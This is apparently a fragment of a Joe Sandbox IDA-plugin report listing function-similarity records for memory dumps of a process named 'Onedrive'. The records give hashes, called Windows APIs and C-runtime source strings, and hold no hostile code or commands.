                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: get_int64_arg
                                                    • String ID: %ls$("'n' format specifier disabled", 0)$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<char,class __crt_stdio_output::stream_output_adapter<char>,class __crt_stdio_output::standard$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                                    • API String ID: 1967237116-3627661228
                                                    • Opcode ID: 6454f08fe2c758332c2d827023cd1bfa62773c42d17287b729fb28d338e575c5
                                                    • Instruction ID: d668ae24d931b302a91c9740e42971828c17467cb01066f6b9e10e3748034423
                                                    • Opcode Fuzzy Hash: 6454f08fe2c758332c2d827023cd1bfa62773c42d17287b729fb28d338e575c5
                                                    • Instruction Fuzzy Hash: BE711935B18B4286EB609B17F470A6A77A0FB85784F510035EA9D5B7E9DF3DD4818B00
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: get_int64_arg
                                                    • String ID: %ls$("'n' format specifier disabled", 0)$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t>,class __crt_stdio_output::fo$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                                    • API String ID: 1967237116-485287010
                                                    • Opcode ID: d356d4bb658979b681b4911ef5bf00e3ae0c0756d7d0f442ad72f8d187c081c4
                                                    • Instruction ID: 0076df5934620cd70838d6f36f03637b011402aca7938c8c7818b3f8cd73329e
                                                    • Opcode Fuzzy Hash: d356d4bb658979b681b4911ef5bf00e3ae0c0756d7d0f442ad72f8d187c081c4
                                                    • Instruction Fuzzy Hash: A7714A31B1CB42C6EB609B17F470A6A77A0FB86784F510435EAAD5B7E8DE3DD4818B00
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %ls$(_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_close_internal$minkernel\crts\ucrt\src\appcrt\lowio\close.cpp
                                                    • API String ID: 0-4089689869
                                                    • Opcode ID: 1ac1be5a7282ee981aa8c6e2645118313e67f99d674ba1043b3155909c36ed17
                                                    • Instruction ID: c16ef597480be778db93845fbbe1fdd5624f65c38d233551ef6f952ee06a1b98
                                                    • Opcode Fuzzy Hash: 1ac1be5a7282ee981aa8c6e2645118313e67f99d674ba1043b3155909c36ed17
                                                    • Instruction Fuzzy Hash: 85715F71B0CA8289E760DB12E460B6AB3A1FB84394F954131E6EE5B6EDDF3CD545CB00
                                                    APIs
                                                    • SetupOpenInfFileW.SETUPAPI(?,?,?,?,?,?,00000000,00000002,?,?,?,00007FF63EA161BD), ref: 00007FF63EA15414
                                                    • SetupGetLineCountW.SETUPAPI(?,?,?,?,?,?,00000000,00000002,?,?,?,00007FF63EA161BD), ref: 00007FF63EA15440
                                                      • Part of subcall function 00007FF63EA162F0: GetProcessHeap.KERNEL32(?,?,0000200000000000,00007FF63EA165C4,?,?,?,?,?,?,?,?,?,00007FF63EA17F0D), ref: 00007FF63EA16414
                                                      • Part of subcall function 00007FF63EA162F0: HeapFree.KERNEL32(?,?,0000200000000000,00007FF63EA165C4,?,?,?,?,?,?,?,?,?,00007FF63EA17F0D), ref: 00007FF63EA16428
                                                    • SetupGetLineByIndexW.SETUPAPI(?,?,?,?,?,?,00000000,00000002,?,?,?,00007FF63EA161BD), ref: 00007FF63EA1548F
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000002,?,?,?,00007FF63EA161BD), ref: 00007FF63EA15555
                                                      • Part of subcall function 00007FF63EA15020: SetupGetStringFieldW.SETUPAPI ref: 00007FF63EA15060
                                                      • Part of subcall function 00007FF63EA15020: GetLastError.KERNEL32 ref: 00007FF63EA15070
                                                      • Part of subcall function 00007FF63EA15020: GetProcessHeap.KERNEL32 ref: 00007FF63EA15114
                                                      • Part of subcall function 00007FF63EA15020: HeapFree.KERNEL32 ref: 00007FF63EA15129
                                                    • SetupCloseInfFile.SETUPAPI ref: 00007FF63EA15595
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Setup$Heap$ErrorFileFreeLastLineProcess$CloseCountFieldIndexOpenString
                                                    • String ID: IsoCodes
                                                    • API String ID: 2280877036-2510055618
                                                    • Opcode ID: be652fbc45620a5908cb8072d4c18c3619e8032dbb75b623b03805d778d16cbb
                                                    • Instruction ID: b3cf964b10d8d6b701a74deec162d9953e12fa55626cb60f84990176bdb3692c
                                                    • Opcode Fuzzy Hash: be652fbc45620a5908cb8072d4c18c3619e8032dbb75b623b03805d778d16cbb
                                                    • Instruction Fuzzy Hash: ED51E622F147039AFB00CBB698103BD26A2BB647A4F955135EE1DD7784EF39D449D720
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: String$DirectFree$AllocContentElement@Release@String@Value@Value@2@@
                                                    • String ID: ErrorCID
                                                    • API String ID: 4116192075-3250631935
                                                    • Opcode ID: 1a5d23ca152dadde304749bc145f2caeedeb1fc9cf03495dad69489016ff52c3
                                                    • Instruction ID: dae7c7969f3264b9e8889c269cd5ebff5bf0781b8b34542bc60b5e135740bb46
                                                    • Opcode Fuzzy Hash: 1a5d23ca152dadde304749bc145f2caeedeb1fc9cf03495dad69489016ff52c3
                                                    • Instruction Fuzzy Hash: 0651BF21F09A5B82EE156B92E45027D5A91EFF8B91F054434FD0EEB391DE3CE80D63A0
                                                    APIs
                                                      • Part of subcall function 00007FF63EA162F0: GetProcessHeap.KERNEL32(?,?,0000200000000000,00007FF63EA165C4,?,?,?,?,?,?,?,?,?,00007FF63EA17F0D), ref: 00007FF63EA16414
                                                      • Part of subcall function 00007FF63EA162F0: HeapFree.KERNEL32(?,?,0000200000000000,00007FF63EA165C4,?,?,?,?,?,?,?,?,?,00007FF63EA17F0D), ref: 00007FF63EA16428
                                                    • GetSystemDirectoryW.KERNEL32 ref: 00007FF63EA1611C
                                                    • GetLastError.KERNEL32 ref: 00007FF63EA1612C
                                                    • GetProcessHeap.KERNEL32 ref: 00007FF63EA16240
                                                    • HeapFree.KERNEL32 ref: 00007FF63EA16255
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess$DirectoryErrorLastSystem
                                                    • String ID: \Phone.inf$\SPPUI
                                                    • API String ID: 2626721824-3874405122
                                                    • Opcode ID: 6d05aa4b119cfc8b7ba9d63c53efe4eb13d6923910aefcd4dd07ad0bc0ba184a
                                                    • Instruction ID: ea4281abefc9628286abd46c37d96e46e81adf04ce51f9228a6bc83afec808d1
                                                    • Opcode Fuzzy Hash: 6d05aa4b119cfc8b7ba9d63c53efe4eb13d6923910aefcd4dd07ad0bc0ba184a
                                                    • Instruction Fuzzy Hash: EC519331F1864686EB249BA1E4506BA6691FFF4780F554035FA4EC3785DF3CE408A720
                                                    APIs
                                                    Strings
                                                    • minkernel\crts\ucrt\src\desktopcrt\env\get_environment_from_os.cpp, xrefs: 00007FFDF3AFA7C4
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_EnvironmentSchedulerScheduler::_Strings
                                                    • String ID: minkernel\crts\ucrt\src\desktopcrt\env\get_environment_from_os.cpp
                                                    • API String ID: 3101938-170101930
                                                    • Opcode ID: 1a6f84b2561e5535daf748ba60a4e3f0bf090e61d0fe745ac4c143497b32d4e6
                                                    • Instruction ID: 3dc227e66d8876ac4c18462a11bb560340ada6f98ff3beaa88f17f873f017151
                                                    • Opcode Fuzzy Hash: 1a6f84b2561e5535daf748ba60a4e3f0bf090e61d0fe745ac4c143497b32d4e6
                                                    • Instruction Fuzzy Hash: B5510722618B8181E750EB26E4617ABB3A0FB91340F510035E6DE5AAEEEF7DD4488B40
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %ls$(_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_commit$minkernel\crts\ucrt\src\appcrt\lowio\commit.cpp
                                                    • API String ID: 0-1026578051
                                                    • Opcode ID: 2d2887217acbfcfde2987cc382d93a8f4af831361eccd80c7ef075718c55646e
                                                    • Instruction ID: bb1e730e88d984508fe5afd3c1272e9fb946eb31fdafd2ba5468df01a6078a5a
                                                    • Opcode Fuzzy Hash: 2d2887217acbfcfde2987cc382d93a8f4af831361eccd80c7ef075718c55646e
                                                    • Instruction Fuzzy Hash: 78516F71B1C64286E7109F25E460B6AB7A0FB80358F521235E2BD5B6EDDF3CD541CB40
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_SchedulerScheduler::___crt_unique_heap_ptr
                                                    • String ID: S$minkernel\crts\ucrt\src\appcrt\stdio\_file.cpp
                                                    • API String ID: 4142048518-4206356308
                                                    • Opcode ID: 6b863b76f611ed7eccb153eacd5d39ea5bac51b1c5f065df2645d33949e99aaf
                                                    • Instruction ID: 1f94c950eef2d0986507e1b5963ccdbed919048ca0f2087cbc4b72ed0a075e04
                                                    • Opcode Fuzzy Hash: 6b863b76f611ed7eccb153eacd5d39ea5bac51b1c5f065df2645d33949e99aaf
                                                    • Instruction Fuzzy Hash: EC517D61B1DA4281EB51DB15E8B4B7977A4EB81750F421336E9BE6E7E8DF3CE4408B00
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                     • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$ErrorExecuteFreeLastProcessShellmemset
                                                    • String ID: https://go.microsoft.com/fwlink/?LinkId=521839
                                                    • API String ID: 1345967500-776123123
                                                    • Opcode ID: 3c8ff984376a63563433bb517d180c30302da773993a283fbe1b66f1df6943b3
                                                    • Instruction ID: 03db0ec21c9a1e8119ea2980cd5c179887447e8e490d2f8306f7f6da55949b5f
                                                    • Opcode Fuzzy Hash: 3c8ff984376a63563433bb517d180c30302da773993a283fbe1b66f1df6943b3
                                                    • Instruction Fuzzy Hash: 97411D32B08A468AEB04AFB5D4503BD67E1EFA8748F554435FA0ED7795DE38E409E320
                                                    APIs
                                                    • Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFDF3AFDAB8
                                                    • __crt_scoped_stack_ptr.LIBCPMTD ref: 00007FFDF3AFDAC2
                                                      • Part of subcall function 00007FFDF3AF0B40: Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFDF3AF0B58
                                                      • Part of subcall function 00007FFDF3AF0D10: Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFDF3AF0D65
                                                      • Part of subcall function 00007FFDF3AF53C0: Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFDF3AF53D3
                                                      • Part of subcall function 00007FFDF3AF53C0: __crt_scoped_stack_ptr.LIBCPMTD ref: 00007FFDF3AF53DD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_SchedulerScheduler::_$__crt_scoped_stack_ptr
                                                    • String ID: %ls$_fclose_nolock_internal$minkernel\crts\ucrt\src\appcrt\stdio\fclose.cpp$stream.valid()
                                                    • API String ID: 4164245112-3166852756
                                                    • Opcode ID: 7981988369232ab8f8a893ab0169fe3df660103c30c3250769104b9faaa05007
                                                    • Instruction ID: 905762befb87bdf40ea594b0115d99d87245a6034c59ed48d6bd379d9f24b4ea
                                                    • Opcode Fuzzy Hash: 7981988369232ab8f8a893ab0169fe3df660103c30c3250769104b9faaa05007
                                                    • Instruction Fuzzy Hash: 54411031B1CA8281EB10EB22E475B6EB760EB81754F510131E6AE5B6DEDF3CD545C740
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: _aligned_msize_invoke_watson_if_error
                                                    • String ID: ]$fp_format_nan_or_infinity$minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp$strcpy_s( result_buffer, result_buffer_count, strings[row][column + !long_string_will_fit])
                                                    • API String ID: 1871870440-1759674166
                                                    • Opcode ID: 40cbd8fc9f1d8437863cf3e661c1112528bfb2bcb4896d92b27ef83705352061
                                                    • Instruction ID: 7f514ad7fe69eb829edce7634bb0ef50a67e50a3010bbe0d15652c601e464b70
                                                    • Opcode Fuzzy Hash: 40cbd8fc9f1d8437863cf3e661c1112528bfb2bcb4896d92b27ef83705352061
                                                    • Instruction Fuzzy Hash: F9413F22A1C7818AE750DB2AE4A076ABBE0E795744F110125F6ED87BE9DB7CD440CF40
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_SchedulerScheduler::___crt_scoped_stack_ptr
                                                    • String ID: %ls$_fclose_internal$minkernel\crts\ucrt\src\appcrt\stdio\fclose.cpp$stream.valid()
                                                    • API String ID: 614740146-2931739134
                                                    • Opcode ID: 39e73b053c62ea83c06c082d52e2ef81818531d9a583e9f0d21007848b92ed5a
                                                    • Instruction ID: 13b8d9c07c5f1e7d6acfffea7172b99317d459b28ea214fe5a9feb353f4f6cf5
                                                    • Opcode Fuzzy Hash: 39e73b053c62ea83c06c082d52e2ef81818531d9a583e9f0d21007848b92ed5a
                                                    • Instruction Fuzzy Hash: D4313031B1CA8291E710EB26E471A6A7760FB81384F911131F6AE5B6EDDF3CD544CB80
                                                    APIs
                                                    • SLGetProductSkuInformation.SLC(?,?,?,?,00000000,00000000,?,00007FF63EA1A536,?,?,?,?,?,?,?,00000000), ref: 00007FF63EA1A281
                                                    • LocalFree.KERNEL32(?,?,?,?,00000000,00000000,?,00007FF63EA1A536,?,?,?,?,?,?,?,00000000), ref: 00007FF63EA1A2AD
                                                    • SLGetProductSkuInformation.SLC(?,?,?,?,00000000,00000000,?,00007FF63EA1A536,?,?,?,?,?,?,?,00000000), ref: 00007FF63EA1A2E2
                                                    • LocalFree.KERNEL32(?,?,?,?,00000000,00000000,?,00007FF63EA1A536,?,?,?,?,?,?,?,00000000), ref: 00007FF63EA1A311
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                     • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: FreeInformationLocalProduct
                                                    • String ID: DependsOn$Family
                                                    • API String ID: 942381732-1323192929
                                                    • Opcode ID: f562f756d88fc8698ec4015293d1e350d35409882a8b0caa2c134b110c04492a
                                                    • Instruction ID: 41a37a45e8a09369764504f8f6ce5cfc31adb768b09003cdb728c4c0ce8a2818
                                                    • Opcode Fuzzy Hash: f562f756d88fc8698ec4015293d1e350d35409882a8b0caa2c134b110c04492a
                                                    • Instruction Fuzzy Hash: A021AE32B18B428AEB118F92E4845BDB7A4FBA9B90F558135EE4E83710DF3DD449D720
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: _abstract_cw$_hw_cw
                                                    • String ID: %ls$(mask&~(_MCW_DN|_MCW_EM|_MCW_RC))==0$minkernel\crts\ucrt\src\appcrt\tran\amd64\ieee.c
                                                    • API String ID: 787819578-4254588316
                                                    • Opcode ID: 3c7496dc418791ef6ba757f371fe8972095d737ac954d17e3b05e68fa93950f6
                                                    • Instruction ID: 83b6bc8ef80c97cc69ff9d11fe47ef0b3ff43eb986f621117bb907bda4c84d7f
                                                    • Opcode Fuzzy Hash: 3c7496dc418791ef6ba757f371fe8972095d737ac954d17e3b05e68fa93950f6
                                                    • Instruction Fuzzy Hash: D9311C72B2CA418BD354DB14E4B192A76A1EB84740F451135F6EA9BBDDDE2CE840CF04
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_SchedulerScheduler::___crt_scoped_stack_ptr
                                                    • String ID: %ls$_fileno$minkernel\crts\ucrt\src\appcrt\stdio\fileno.cpp$stream.valid()
                                                    • API String ID: 614740146-3741990651
                                                    • Opcode ID: fbaf7d3e15aa925d7e701ef2d92dac18c3d8396f506b789b98d13b46ce91094e
                                                    • Instruction ID: 5d63aabdfd7754a0a0464a71142bfd81594020c4029200613e48f77977357fe6
                                                    • Opcode Fuzzy Hash: fbaf7d3e15aa925d7e701ef2d92dac18c3d8396f506b789b98d13b46ce91094e
                                                    • Instruction Fuzzy Hash: B4214D71B1CA8295E750AB22E470BAB7660FB90344F811131E6AE5B6DDDF7CD544CB40
                                                    APIs
                                                    • StrToID.DUI70(?,?,00000000,00007FF63EA1B9AC), ref: 00007FF63EA1BB6B
                                                    • ?FindDescendent@Element@DirectUI@@QEAAPEAV12@G@Z.DUI70(?,?,00000000,00007FF63EA1B9AC), ref: 00007FF63EA1BB7E
                                                    • ?CreateString@Value@DirectUI@@SAPEAV12@PEBGPEAUHINSTANCE__@@@Z.DUI70(?,?,00000000,00007FF63EA1B9AC), ref: 00007FF63EA1BB96
                                                    • ?SetValue@Element@DirectUI@@QEAAJP6APEBUPropertyInfo@2@XZHPEAVValue@2@@Z.DUI70(?,?,00000000,00007FF63EA1B9AC), ref: 00007FF63EA1BBD0
                                                    • ?Release@Value@DirectUI@@QEAAXXZ.DUI70(?,?,00000000,00007FF63EA1B9AC), ref: 00007FF63EA1BBDF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                     • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Direct$Value@$Element@V12@$CreateDescendent@E__@@@FindInfo@2@PropertyRelease@String@Value@2@@
                                                    • String ID: ErrorCID
                                                    • API String ID: 3965188616-3250631935
                                                    • Opcode ID: 1ee354ba4db03265580357cb67ba2b8d0dd7a090ad87e17df1e797e7864e6d7e
                                                    • Instruction ID: cbb536b3345c40d53ef14c058ce732a8c53a4c305f7801c318749b89c2a92247
                                                    • Opcode Fuzzy Hash: 1ee354ba4db03265580357cb67ba2b8d0dd7a090ad87e17df1e797e7864e6d7e
                                                    • Instruction Fuzzy Hash: 95113C36A08A82C3EB145B52A850078ABA1FFF9B81F489171ED4E97758CF3CD4499720
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
